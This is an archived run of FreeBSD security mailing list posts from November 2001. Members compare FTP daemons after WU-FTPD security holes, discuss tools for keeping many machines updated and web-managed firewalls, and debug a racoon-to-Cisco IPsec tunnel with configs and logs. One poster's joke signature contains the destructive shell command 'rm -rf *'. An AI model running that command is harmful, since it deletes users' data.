For the boxes I help look after, there is a real cost every time we need to upgrade the software, not to mention the risk exposure while the hole is left unpatched. x bugs a year vs x+y is a measurable difference for us. For larger networks this becomes even more acute of course. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 7:19:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id C1CA737B416 for ; Tue, 20 Nov 2001 07:19:32 -0800 (PST) Received: from schulte-laptop.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id 1A44D2440B; Tue, 20 Nov 2001 09:19:28 -0600 (CST) Message-Id: <5.1.0.14.0.20011120091400.01b83e48@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 20 Nov 2001 09:19:24 -0600 To: RoBSD From: Christopher Schulte Subject: Re[2]: Fwd: Vendors For WU-FTPD Please Read Cc: security@FreeBSD.ORG In-Reply-To: <722713532.20011120150917@softhome.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Let's not forget ncftpd. http://www.ncftpd.com/ I've got it configured to: 1) not allow download of '/incoming/' files from ftp users 2) set local filesystem permissions to prevent other real users from reading these files There's not been one root exploit since I began using it in 1997. At 03:09 PM 11/20/2001 +0000, you wrote: >www.pureftpd.org >MC> www.proftpd.org > > >> What would be a good alternative to WU-FTPD that allows safe one way > uploads ? 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 7:42:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from cc415903-b.ebnsk1.nj.home.com (cc415903-b.ebnsk1.nj.home.com [24.180.16.158]) by hub.freebsd.org (Postfix) with SMTP id 2FDA037B405 for ; Tue, 20 Nov 2001 07:42:22 -0800 (PST) Received: (qmail 35300 invoked from network); 20 Nov 2001 15:45:35 -0000 Received: from athena.faerunhome.com (HELO athena.home.com) (192.168.0.2) by cc415903-b.ebnsk1.nj.home.com with SMTP; 20 Nov 2001 15:45:35 -0000 Message-Id: <5.1.0.14.2.20011120104126.02698ec0@netmail.home.com> X-Sender: damascus@netmail.home.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 20 Nov 2001 10:43:42 -0500 To: Mike Tancsa From: Carroll Kong Subject: Re: Fwd: Vendors For WU-FTPD Please Read Cc: Mitch Collinsworth , security@FreeBSD.ORG In-Reply-To: <5.1.0.14.0.20011120095853.038e9280@marble.sentex.ca> References: <5.1.0.14.0.20011120093740.038e2580@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:10 AM 11/20/01 -0500, Mike Tancsa wrote: >At 09:55 AM 11/20/01 -0500, Mitch Collinsworth wrote: > >>On Tue, 20 Nov 2001, Mike Tancsa wrote: >> >> > It too seems to be vulnerable to various security holes in the recent and >> > not so recent past :-( >> >>Name one thing that hasn't been. The real issue, IMO, is not >>having never had a security bug, but how quickly bugs are fixed >>and how easy it is to apply the fixes. > >qmail ? Anyways, I am not looking at either bugs or zero bugs-- just less >bugs. The stock ftpd that comes with FreeBSD has not had many holes for >example. 
For the boxes I help look after, there is a real cost every time >we need to upgrade the software, not to mention the risk exposure while >the hole is left unpatched. x bugs a year vs x+y is a measurable >difference for us. For larger networks this becomes even more acute of course. > > ---Mike >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message I have noticed that ncftpd seems to be a pretty solid ftpd in terms of a good security track record. Unfortunately, it costs a little bit for licensing. The stock ftpd with FreeBSD is indeed very good. Finally, I agree with Mike. When you start managing more and more boxes, it becomes a serious pain in the butt. You have to worry so much more (which is part of the job, but still), about sendmail or bind or wu-ftpd blowing up. It is nicer if you can get something that has a few less bugs to minimize this. -Carroll Kong To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 8:11:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id CBB3F37B405 for ; Tue, 20 Nov 2001 08:11:10 -0800 (PST) Received: from ruby.ccmr.cornell.edu (IDENT:0@ruby.ccmr.cornell.edu [128.84.231.115]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id LAA04138; Tue, 20 Nov 2001 11:12:15 -0500 Received: from localhost (mitch@localhost) by ruby.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id LAA03241; Tue, 20 Nov 2001 11:11:10 -0500 X-Authentication-Warning: ruby.ccmr.cornell.edu: mitch owned process doing -bs Date: Tue, 20 Nov 2001 11:11:10 -0500 (EST) From: Mitch Collinsworth X-Sender: mitch@ruby.ccmr.cornell.edu To: Carroll Kong Cc: Mike Tancsa , security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: 
<5.1.0.14.2.20011120104126.02698ec0@netmail.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 20 Nov 2001, Carroll Kong wrote: > Finally, I agree with Mike. When you start managing more and more boxes, > it becomes a serious pain in the butt. You have to worry so much more > (which is part of the job, but still), about sendmail or bind or wu-ftpd > blowing up. It is nicer if you can get something that has a few less bugs > to minimize this. Agreed, a few less is always better than a few more. But applying security updates is part of our job as sysadmins. If you have lots of boxen to look after, you need to automate the update process. There are various approaches to this. I like cfengine. We're now experimenting with PXE and auto reinstalls. There are other good approaches besides these. 
-Mitch

From owner-freebsd-security Tue Nov 20 9:01:23 2001
From: Luc
Reply-To: luc@2113.ch
Date: Tue, 20 Nov 2001 18:01:26 +0100
To: security@FreeBSD.ORG
Subject: Re: Fwd: Vendors For WU-FTPD Please Read
Message-ID: <3BFA8C66.451F0835@2113.ch>
References: <5.1.0.14.0.20011120093740.038e2580@marble.sentex.ca> <5.1.0.14.2.20011120104126.02698ec0@netmail.home.com>

Since everyone tells about their favorite FTPd, here is mine: muddleftpd

    http://www.arach.net.au/~wildfire/muddleftpd/

Muddleftpd is a new ftp server that can perform a variety of ftp tasks.
It is simple to set up, fast, secure and reasonably lightweight.
Cheers
Luc

From owner-freebsd-security Tue Nov 20 9:18:11 2001
Date: Tue, 20 Nov 2001 20:18:54 +0300 (EAT)
To: Mitch Collinsworth
Cc: Mike Tancsa
Subject: Re: Fwd: Vendors For WU-FTPD Please Read

> Name one thing that hasn't been.

The real issue, IMO, is not vsftpd.

Noah.
From owner-freebsd-security Tue Nov 20 9:24:55 2001
Date: Tue, 20 Nov 2001 20:25:46 +0300 (EAT)
To: Mitch Collinsworth
Cc: Carroll Kong, Mike Tancsa
Subject: Re: Fwd: Vendors For WU-FTPD Please Read

> Agreed, a few less is always better than a few more. But applying
> security updates is part of our job as sysadmins. If you have lots
> of boxen to look after, you need to automate the update process.
> There are various approaches to this. I like cfengine. We're now
> experimenting with PXE and auto reinstalls. There are other good
> approaches besides these.

rdist is an interesting approach for keeping multiple machines up to date.

On the note about ftp daemons: I have been using vsftpd for some time and
I am yet to hear of any security bugs. I like the simple way in which one
can chroot users to their home directories by simply putting the user name
in a file.

Noah.
From owner-freebsd-security Tue Nov 20 11:45:58 2001
From: Garrett Wollman
Date: Tue, 20 Nov 2001 14:45:25 -0500 (EST)
Subject: Re: Fwd: Vendors For WU-FTPD Please Read
Message-Id: <200111201945.fAKJjP038014@khavrinen.lcs.mit.edu>

< said:

> rdist is an interesting approach for keeping multiple machines up to date.

Unfortunately (and I can speak from experience) rdist's protocol is
fairly brain-dead and runs in lock-step, thus dramatically bloating
the time it takes to do even a null update on a large file set. If
there were another option that did what rdist does, I'd switch in an
instant.
-GAWollman

From owner-freebsd-security Tue Nov 20 12:20:20 2001
From: Nate Williams
Reply-To: nate@yogotech.com (Nate Williams)
Date: Tue, 20 Nov 2001 13:19:29 -0700
To: Garrett Wollman
Subject: Re: Fwd: Vendors For WU-FTPD Please Read
Message-ID: <15354.47825.468400.219954@caddis.yogotech.com>
In-Reply-To: <200111201945.fAKJjP038014@khavrinen.lcs.mit.edu>

> < said:
>
> > rdist is an interesting approach for keeping multiple machines up to date.
>
> Unfortunately (and I can speak from experience) rdist's protocol is
> fairly brain-dead and runs in lock-step, thus dramatically bloating
> the time it takes to do even a null update on a large file set. If
> there were another option that did what rdist does, I'd switch in an
> instant.

CVSup?
:)

Nate

From owner-freebsd-security Tue Nov 20 12:24:13 2001
From: Mitch Collinsworth
Date: Tue, 20 Nov 2001 15:24:07 -0500 (EST)
To: Garrett Wollman
Cc: security@FreeBSD.ORG
Subject: Re: Fwd: Vendors For WU-FTPD Please Read
In-Reply-To: <200111201945.fAKJjP038014@khavrinen.lcs.mit.edu>

On Tue, 20 Nov 2001, Garrett Wollman wrote:

> If
> there were another option that did what rdist does, I'd switch in an
> instant.
http://www.iu.hio.no/cfengine/

From owner-freebsd-security Tue Nov 20 15:21:05 2001
From: "Laurence Brockman"
Date: Tue, 20 Nov 2001 16:24:34 -0700
Subject: Firewall products question
Message-ID: <00c901c1721a$83fbfbd0$3531000a@shaw.ca>

Heya all,

I'm looking for a product (Preferably open source) that is a
firewall/vpn (Yes, I know this is all easily done in freebsd for the
most part), and here's the kicker. It has to be managed through a web
interface.

Any ideas?

Thanks
Laurence
From owner-freebsd-security Tue Nov 20 16:51:23 2001
From: eberkut
Date: Wed, 21 Nov 2001 01:22:54 +0100
To: security@freebsd.org
Subject: Re: Fwd: Vendors For WU-FTPD Please Read
Message-Id: <200111210050.fAL0oei358575@logs-tk.proxy.aol.com>
Organization: CNS / Minithins

20/11/01 21:24:07, Mitch Collinsworth wrote:

>> If
>> there were another option that did what rdist does, I'd switch in an
>> instant.
>
> http://www.iu.hio.no/cfengine/

Even better, use cfengine with rsync through ssh for secure transfer and
copying only the part that changes (cf.
http://www.cs.arizona.edu/people/jdavis/cfengine.html). And you could also
try Unison, which is a bidirectional rsync-like.

    http://www.cis.upenn.edu/~bcpierce/unison/

--eberkut
ex diffinientium cognitione diffiniti resultat cognitio
. Prelude : http://prelude.sf.net .
CNS : http://minithins.net

From owner-freebsd-security Tue Nov 20 16:52:58 2001
From: Dave Ryan
Date: Wed, 21 Nov 2001 00:54:17 +0000
To: freebsd-security@FreeBSD.ORG
Subject: Re: Firewall products question
Message-ID: <20011121005417.A32244@default.eng.eircom.net>
In-Reply-To: <00c901c1721a$83fbfbd0$3531000a@shaw.ca>
Organization: Eircom CIRT

Laurence Brockman said the following on Tue, Nov 20, 2001 at 04:24:34PM -0700,

> Heya all,
>
> I'm looking for a product (Preferably open source) that is a
> firewall/vpn (Yes, I know this is all easily done in freebsd for the
> most part), and here's the kicker. It has to be managed through a web
> interface.
>
> Any ideas?
www.smoothwall.org

--
Dave Ryan                Security Advisor
dave.ryan@eircom.net     Computer Incident Response Team

From owner-freebsd-security Tue Nov 20 17:30:13 2001
From: Nick Slager
Date: Wed, 21 Nov 2001 11:30:03 +1000
To: freebsd-security@freebsd.org
Subject: KAME IPsec <--> cisco
Message-ID: <20011121113003.A2610@BlueSkyFrog.COM>

A similar message to this was posted to -security last week. I've still
not made any progress on why my setup isn't working, so this is another
attempt :)

Trying to set up an IPsec VPN between a 4.4-REL box and a Cisco router.
Running racoon 20010126a for key exchange. My config looks like this:

203.1.1.2 --- 203.1.1.1 --- Internet --- 203.2.2.1 --- 203.2.2.2

202.1.1.2: Host needing to talk to 203.2.2.2
203.1.1.1: FreeBSD VPN host running IPsec and racoon
203.2.2.1: Cisco 3640 router
203.2.2.2: Host with services for 203.1.1.2

Note that 203.1.1.2 and 203.2.2.2 are individual hosts, not networks.
Using IPsec in tunnel mode.

As noted last week, phase 1 negotiation is not completing.
However I can't see what the problem is; all looks like it is set up
correctly to me. All the configuration details are below. Any help
appreciated.

Nick

The configuration on 203.1.1.1 (FreeBSD host) is like this:

/etc/ipsec.conf:

flush;
spdflush;
spdadd 203.1.1.2/32 203.2.2.2/32 any -P out ipsec esp/tunnel/203.1.1.1-203.2.2.1/require;
spdadd 203.2.2.2/32 203.1.1.2/32 any -P in ipsec esp/tunnel/203.2.2.1-203.1.1.1/require;

ifconfig gif0:

gif0: flags=8051 mtu 1280
        tunnel inet 203.1.1.1 --> 203.2.2.1
        inet 203.1.1.2 --> 203.2.2.2 netmask 0xffffff00

racoon.conf:

remote 203.2.2.1 {
        exchange_mode aggressive,main,base;
        doi ipsec_doi;
        situation identity_only;
        my_identifier address 203.1.1.1;
        peers_identifier address 203.2.2.1;
        nonce_size 16;
        lifetime time 24 hour;          # sec,min,hour
        initial_contact on;
        support_mip6 on;
        proposal_check obey;            # obey, strict or claim
        proposal {
                encryption_algorithm des;
                hash_algorithm md5;
                authentication_method pre_shared_key;
                dh_group 1;
        }
}

sainfo address 203.1.1.2 any address 203.2.2.0/32 any {
        pfs_group 1;
        lifetime time 24 hour;
        encryption_algorithm des, 3des, blowfish;
        authentication_algorithm hmac_md5, hmac_sha1;
        compression_algorithm deflate;
}

The Cisco's config is like this (203.2.2.1):

crypto isakmp key **password** address 203.1.1.1

crypto map nolan 16 ipsec-isakmp
 set peer 203.1.1.1
 set transform-set vodafone
 set pfs group1
 match address 186

crypto ipsec transform-set vodafone esp-des esp-md5-hmac

access-list 186 permit ip 203.2.2.0 0.0.0.255 host 203.1.1.2

When I try to contact 203.2.2.2 from 203.1.1.2, racoon logs the following:

2001-11-20 10:39:46: DEBUG: pfkey.c:192:pfkey_handler(): get pfkey ACQUIRE message
2001-11-20 10:39:46: DEBUG: pfkey.c:1519:pk_recvacquire(): suitable outbound SP found: 203.1.1.2/32[0] 203.2.2.0/24[0] proto=any dir=out.
2001-11-20 10:39:46: DEBUG: policy.c:183:cmpspidxstrict(): sub:0xbfbff89c: 203.2.2.0/24[0] 203.1.1.2/32[0] proto=any dir=in
2001-11-20 10:39:46: DEBUG: policy.c:184:cmpspidxstrict(): db :0x80a3a08: 203.2.2.0/24[0] 203.1.1.2/32[0] proto=any dir=in
2001-11-20 10:39:46: DEBUG: pfkey.c:1535:pk_recvacquire(): suitable inbound SP found: 203.2.2.0/24[0] 203.1.1.2/32[0] proto=any dir=in.
2001-11-20 10:39:46: DEBUG: pfkey.c:1574:pk_recvacquire(): new acquire 203.1.1.2/32[0] 203.2.2.0/24[0] proto=any dir=out
2001-11-20 10:39:46: DEBUG: proposal.c:822:printsaproto(): (proto_id=ESP spisize=4 spi=00000000 spi_p=00000000 encmode=Tunnel reqid=0:0)
2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=DES encklen=0 authtype=1)
2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=DES encklen=0 authtype=2)
2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=3DES encklen=0 authtype=1)
2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=3DES encklen=0 authtype=2)
2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=BLOWFISH encklen=128 authtype=1)
2001-11-20 10:39:46: DEBUG: proposal.c:856:printsatrns(): (trns_id=BLOWFISH encklen=128 authtype=2)
2001-11-20 10:39:46: DEBUG: remoteconf.c:118:getrmconf(): configuration found for 203.2.2.1.
2001-11-20 10:39:46: INFO: isakmp.c:1726:isakmp_post_acquire(): IPsec-SA request for 203.2.2.1 queued due to no phase1 found.
2001-11-20 10:39:46: DEBUG: isakmp.c:811:isakmp_ph1begin_i(): ===
2001-11-20 10:39:46: INFO: isakmp.c:816:isakmp_ph1begin_i(): initiate new phase 1 negotiation: 203.1.1.1[500]<=>203.2.2.1[500]
2001-11-20 10:39:46: INFO: isakmp.c:821:isakmp_ph1begin_i(): begin Aggressive mode.
2001-11-20 10:39:46: DEBUG: isakmp.c:2038:isakmp_newcookie(): new cookie: 91ee566224a1929d
2001-11-20 10:39:46: DEBUG: ipsec_doi.c:3181:ipsecdoi_setid1(): use ID type of IPv4_address
2001-11-20 10:39:46: DEBUG: oakley.c:250:oakley_dh_generate(): compute DH's private.
2001-11-20 10:39:46: DEBUG: plog.c:193:plogdump():
5d5c8244 477c42fa 6e02f17b a808eb1a f6b85730 e22a2860 5f95b418 a1bd0dea
5e6a6c83 a44691b1 f140471a f5af3801 f7f133bb c4b064f1 008bd5c0 ab21ca63
d92f69b7 fb103832 d4cb79b0 6cd5aba0 75203e19 4893bc03 52567e98 5b1ad577
2001-11-20 10:39:46: DEBUG: oakley.c:252:oakley_dh_generate(): compute DH's public.
2001-11-20 10:39:46: DEBUG: plog.c:193:plogdump():
a72df3e6 5047891c 13bd82d3 b85cb341 b6f0ce0c 028aacba b1b34248 44cc0b38
dda955d1 d8084d69 01971b07 9e87bab8 c0e72953 e18c22a8 d880e5de eb1eb23b
e291890f 02ffd197 5c753de3 2bca8a85 d4924a54 bfb09edc 39bc8c00 a69c2a52
2001-11-20 10:39:46: DEBUG: isakmp_agg.c:157:agg_i1send(): authmethod is pre-shared key
2001-11-20 10:39:46: DEBUG: isakmp.c:2155:set_isakmp_payload(): add payload of len 52, next type 4
2001-11-20 10:39:46: DEBUG: isakmp.c:2155:set_isakmp_payload(): add payload of len 96, next type 10
2001-11-20 10:39:46: DEBUG: isakmp.c:2155:set_isakmp_payload(): add payload of len 16, next type 5
2001-11-20 10:39:46: DEBUG: isakmp.c:2155:set_isakmp_payload(): add payload of len 8, next type 0
2001-11-20 10:39:46: DEBUG: isakmp.c:2290:isakmp_printpacket(): begin.
2001-11-20 10:39:46: DEBUG: sockmisc.c:424:sendfromto(): sockname 203.1.1.1[500]
2001-11-20 10:39:46: DEBUG: sockmisc.c:426:sendfromto(): send packet from 203.1.1.1[500]
2001-11-20 10:39:46: DEBUG: sockmisc.c:428:sendfromto(): send packet to 203.2.2.1[500]
2001-11-20 10:39:46: DEBUG: isakmp.c:1462:isakmp_send(): 1 times of 216 bytes message will be sent.
2001-11-20 10:39:46: DEBUG: plog.c:193:plogdump():
91ee5662 24a1929d 00000000 00000000 01100400 00000000 000000d8 04000038
00000001 00000001 0000002c 01010001 00000024 01010000 800b0001 000c0004
00015180 80010001 80030001 80020001 80040001 0a000064 a72df3e6 5047891c
13bd82d3 b85cb341 b6f0ce0c 028aacba b1b34248 44cc0b38 dda955d1 d8084d69
01971b07 9e87bab8 c0e72953 e18c22a8 d880e5de eb1eb23b e291890f 02ffd197
5c753de3 2bca8a85 d4924a54 bfb09edc 39bc8c00 a69c2a52 05000014 ac7ae33c
250a0483 75ed4d2c f8256442 0000000c 01110000 cbb9df13
2001-11-20 10:39:46: DEBUG: isakmp.c:233:isakmp_handler(): ===
2001-11-20 10:39:46: DEBUG: isakmp.c:234:isakmp_handler(): 96 bytes message received from 203.2.2.1[500]
2001-11-20 10:39:46: DEBUG: plog.c:193:plogdump():
91ee5662 24a1929d 19e865f5 b4290dd3 0b100500 00000000 00000060 00000044
00000001 0100000e 04000038 00000001 00000001 323b59e8 00000004 00000000
624c0f4c 611cf22c 00000001 00000000 612ccc00 00000000 01000000 00000000
2001-11-20 10:39:46: DEBUG: isakmp.c:2290:isakmp_printpacket(): begin.
2001-11-20 10:39:46: DEBUG: isakmp_inf.c:114:isakmp_info_recv(): receive Information.
2001-11-20 10:39:46: DEBUG: isakmp.c:1133:isakmp_parsewoh(): begin.
2001-11-20 10:39:46: DEBUG: isakmp.c:1160:isakmp_parsewoh(): seen nptype=11(notify)
2001-11-20 10:39:46: DEBUG: isakmp.c:1198:isakmp_parsewoh(): succeed.
2001-11-20 10:39:46: ERROR: isakmp_inf.c:769:isakmp_info_recv_n(): delete phase1 handle.
2001-11-20 10:39:46: ERROR: schedule.c:210:sched_scrub_param(): insanity schedule found.
2001-11-20 10:39:46: ERROR: isakmp_inf.c:792:isakmp_info_recv_n(): invalid spi_size in notification payload.
2001-11-20 10:39:46: DEBUG: isakmp_inf.c:797:isakmp_info_recv_n(): notification message 14:NO-PROPOSAL-CHOSEN, doi=1 proto_id=1 spi=(size=0).
2001-11-20 10:40:18: ERROR: isakmp.c:1818:isakmp_chkph1there(): phase2 negotiation failed due to time up waiting for phase1.
        ESP 203.2.2.1->203.1.1.1
2001-11-20 10:40:18: INFO: isakmp.c:1823:isakmp_chkph1there(): delete phase 2 handler.

From owner-freebsd-security Tue Nov 20 21:31:53 2001
From: "Sergey N. Voronkov"
Date: Wed, 21 Nov 2001 10:31:46 +0500
To: Luc
Cc: security@FreeBSD.ORG
Subject: Re: Fwd: Vendors For WU-FTPD Please Read
Message-ID: <20011121103146.A2341@sv.tech.sibitex.tmn.ru>
In-Reply-To: <3BFA8C66.451F0835@2113.ch>

On Tue, Nov 20, 2001 at 06:01:26PM +0100, Luc wrote:
> Since everyone tells about their favorite FTPd,
> here is mine: muddleftpd
> http://www.arach.net.au/~wildfire/muddleftpd/
>
> Muddleftpd is a new ftp server that can perform a variety of ftp tasks.
> It is simple to set up, fast, secure and reasonably lightweight.

I prefer lukemftpd.

Pluses:
1) 4.4-Lite BSD based code.
2) Highly configurable.
3) Very stable.

Minuses:
1) Hard to set up.
2) Extensive code maintenance (NetBSD).

Serg N. Voronkov,
Sibitex JSC.

From owner-freebsd-security Tue Nov 20 23:20:29 2001
From: Shoichi Sakane
Date: Wed, 21 Nov 2001 16:20:28 +0900
To: ns@BlueSkyFrog.COM
Cc: freebsd-security@freebsd.org
Subject: Re: KAME IPsec <--> cisco
Message-Id: <20011121162028G.sakane@kame.net>
In-Reply-To: <20011121113003.A2610@BlueSkyFrog.COM>

> As noted last week, phase 1 negotiation is not completing. However
> I can't see what the problem is; all looks like it is set up
> correctly to me.

> The Cisco's config is like this (203.2.2.1):
> crypto isakmp key **password** address 203.1.1.1
>
> crypto map nolan 16 ipsec-isakmp
> set peer 203.1.1.1
> set transform-set vodafone
> set pfs group1
> match address 186
>
> crypto ipsec transform-set vodafone esp-des esp-md5-hmac
>
> access-list 186 permit ip 203.2.2.0 0.0.0.255 host 203.1.1.2

Did you check the phase 1 configuration on the cisco? I'm not sure about
the cisco configuration, but I think all of the above things are probably
for phase 2.
> When I try to contact 203.2.2.2 from 203.1.1.2, racoon logs the
> following:

> 2001-11-20 10:39:46: DEBUG: isakmp_inf.c:797:isakmp_info_recv_n(): notification message 14:NO-PROPOSAL-CHOSEN, doi=1 proto_id=1 spi=(size=0).
> 2001-11-20 10:40:18: ERROR: isakmp.c:1818:isakmp_chkph1there(): phase2 negotiation failed due to time up waiting for phase1. ESP 203.2.2.1->203.1.1.1

The problem is that the cisco complained about the phase 1 proposal
which racoon sent.

From owner-freebsd-security Wed Nov 21 2:21:20 2001
From: freebsd-security-local@insignia.com
Date: Wed, 21 Nov 2001 10:21:04 +0000
To: freebsd-security@freebsd.org
Subject: KAME IPSec <->Redcreek

I wonder if anyone has had success talking to a RedCreek Ravlin VPN
gateway. I have some colleagues who are successfully using freeswan, but
I'm having none at all with racoon. A packet trace shows the initial
packet going to port 500 of the Ravlin, but no response.
Unfortunately the Ravlin doesn't syslog anything at all in this
situation, so it's kind of hard to debug! This is with the October
snapshot from the ports.

jim

From owner-freebsd-security Wed Nov 21 3:45:46 2001
From: "Dave Raven"
Date: Wed, 21 Nov 2001 13:42:36 +0200
Subject: Re: Firewall products question
Message-ID: <001701c17281$a021c580$3600a8c0@DAVE>
References: <00c901c1721a$83fbfbd0$3531000a@shaw.ca> <20011121005417.A32244@default.eng.eircom.net>

IP Filter has a webmin module as well.

http://www.wiejak.priv.pl/pub/Linux/system/admin/WebminModules/Ipf_admin.wbm

----- Original Message -----
From: "Dave Ryan"
Sent: Wednesday, November 21, 2001 2:54 AM
Subject: Re: Firewall products question

> Laurence Brockman said the following on Tue, Nov 20, 2001 at 04:24:34PM -0700,
> > Heya all,
> >
> > I'm looking for a product (Preferably open source) that is a
> > firewall/vpn (Yes, I know this is all easily done in freebsd for the
> > most part), and here's the kicker. It has to be managed through a web
> > interface.
> >
> > Any ideas?
>
> www.smoothwall.org
>
> --
> Dave Ryan                Security Advisor
> dave.ryan@eircom.net     Computer Incident Response Team

From owner-freebsd-security Wed Nov 21 3:53:26 2001
From: Nick Slager
Date: Wed, 21 Nov 2001 21:50:34 +1000
To: Shoichi Sakane
Cc: freebsd-security@freebsd.org
Subject: Re: KAME IPsec <--> cisco
Message-ID: <20011121215034.A10527@BlueSkyFrog.COM>
In-Reply-To: <20011121162028G.sakane@kame.net>

Thus spake Shoichi Sakane (sakane@kame.net):

> Did you check the phase 1 configuration on the cisco? I'm not sure about
> the cisco configuration, but I think all of the above things are probably
> for phase 2.

OK, I will double check the cisco configuration.

> The problem is that the cisco complained about the phase 1 proposal
> which racoon sent.
So the cisco router isn't happy with racoon's proposal, not the other way around. I wasn't sure on this.

There definitely seem to be issues with the cisco config, which unfortunately isn't under my control. I will investigate.

Thanks for your help,

Nick

--
Excuse of the day: It must have been the lightning storm we had yesterday

From: Peter Pentchev
To: "Sergey N. Voronkov"
Cc: Luc, security@FreeBSD.ORG
Subject: Re: Fwd: Vendors For WU-FTPD Please Read
Date: Wed, 21 Nov 2001 14:21:11 +0200

On Wed, Nov 21, 2001 at 10:31:46AM +0500, Sergey N. Voronkov wrote:
> On Tue, Nov 20, 2001 at 06:01:26PM +0100, Luc wrote:
> > Since everyone tells about their favorite FTPd,
> > here is mine: muddleftpd
> > http://www.arach.net.au/~wildfire/muddleftpd/
> >
> > Muddleftpd is a new ftp server that can perform a variety of ftp tasks.
> > It is simple to set up, fast, secure and reasonably lightweight.
>
> I prefer lukemftpd.
>
> Pluses:
> 1) 4.4-Lite BSD based code.
> 2) Highly configurable.
> 3) Very stable.
>
> Minuses:
> 1) Hard to set up.
> 2) Extensive code maintenance (NetBSD).

Maybe I'm missing something here, but how exactly is code maintenance a minus? :)

G'luck,
Peter

--
"yields falsehood, when appended to its quotation." yields falsehood, when appended to its quotation.

From: "Sergey N. Voronkov"
To: security@FreeBSD.ORG
Subject: Re: Fwd: Vendors For WU-FTPD Please Read
Date: Wed, 21 Nov 2001 17:32:42 +0500

On Wed, Nov 21, 2001 at 02:21:11PM +0200, Peter Pentchev wrote:
> On Wed, Nov 21, 2001 at 10:31:46AM +0500, Sergey N. Voronkov wrote:
> > On Tue, Nov 20, 2001 at 06:01:26PM +0100, Luc wrote:
> > > Since everyone tells about their favorite FTPd,
> > > here is mine: muddleftpd
> > > http://www.arach.net.au/~wildfire/muddleftpd/
> > >
> > > Muddleftpd is a new ftp server that can perform a variety of ftp tasks.
> > > It is simple to set up, fast, secure and reasonably lightweight.
> >
> > I prefer lukemftpd.
> >
> > Pluses:
> > 1) 4.4-Lite BSD based code.
> > 2) Highly configurable.
> > 3) Very stable.
> >
> > Minuses:
> > 1) Hard to set up.
> > 2) Extensive code maintenance (NetBSD).
>
> Maybe I'm missing something here, but how exactly is code maintenance
> a minus? :)
>

Ooops! I mean s/Extensive/External/ ;-)

And lukemftpd code is just a periodical "snapshot" of native NetBSD ftpd, as far as I know. (Just looking into http://www.freebsd.org/cgi/cvsweb.cgi/basesrc/libexec/ftpd/?cvsroot=netbsd )

I think it is a minus to this really great ftp daemon.

Best Regards,

Serg N. Voronkov,
Sibitex JSC.
From: Ron 'The InSaNe One' Rosson
To: security@freebsd.org
Subject: IPSec Tunnel
Date: Wed, 21 Nov 2001 06:35:07 -0800

Heya,
Anyone know of any links on how to build an ipsec tunnel between an openbsd machine and a freebsd machine?

Been working on it for 2 days now and everything I found is incomplete and does not work.

TIA

--
Ron Rosson                    ... and a UNIX user said ...
The InSaNe One                        rm -rf *
insane@oneinsane.net          and all was /dev/null and *void()
...and that is how we know the Earth to be banana-shaped.
From: "Dave Raven"
To: "Ron Rosson"
Subject: Re: IPSec Tunnel
Date: Wed, 21 Nov 2001 16:51:24 +0200

A google search has come up with some decent looking ones.

http://www.google.com/search?q=IPSec+Tunnel+On+FreeBSD
http://www.daemonnews.org/200101/ipsec-howto.html
http://www.mutex.org/aaron/tips/ipsec
http://www.x-itec.de/projects/tuts/ipsec-howto.txt
http://www.freebsddiary.org/ipsec-tunnel.php

----- Original Message -----
From: "Ron 'The InSaNe One' Rosson"
Sent: Wednesday, November 21, 2001 4:35 PM
Subject: IPSec Tunnel

> Heya,
> Anyone know of any links on how to build an ipsec tunnel between an
> openbsd machine and a freebsd machine?
>
> Been working on it for 2 days now and everything I found is incomplete
> and does not work.
>
> TIA
>
> --
> Ron Rosson                    ... and a UNIX user said ...
> The InSaNe One                        rm -rf *
> insane@oneinsane.net          and all was /dev/null and *void()
> ...and that is how we know the Earth to be banana-shaped.

From: Adam Laurie
To: Ron Rosson
Cc: security@freebsd.org
Subject: Re: IPSec Tunnel
Date: Wed, 21 Nov 2001 15:13:02 +0000

Ron 'The InSaNe One' Rosson wrote:
>
> Heya,
> Anyone know of any links on how to build an ipsec tunnel between an
> openbsd machine and a freebsd machine?
>
> Been working on it for 2 days now and everything I found is incomplete
> and does not work.

